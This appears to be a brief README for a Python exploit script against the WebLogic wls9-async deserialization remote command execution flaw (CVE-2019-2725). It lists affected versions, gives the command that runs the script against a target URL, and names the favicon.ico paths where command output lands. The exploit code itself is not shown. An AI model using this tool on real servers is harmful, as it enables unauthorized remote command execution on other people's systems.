WebLogic wls9-async反序列化远程命令执行漏漏洞
- It's does't work when weblogic patched for cve-2017-10271
- 10.3.6.0
- 12.1.3.0
基于jas502n的脚本修改而成
python async_command_favicon_all.py http://127.0.0.1:7001
- servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/favicon.ico
- servers/myserver/tmp/_WL_internal/bea_wls_internal/uwyp3r/war/favicon.ico
- when you create WLS domain with terminal, it will create myserver instead of AdminServer which create WLS domain by invoking the GUI configurationwizard.
- servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/favicon.ico
Weblogic反序列化远程代码执行漏洞(CVE-2019-2725)分析报告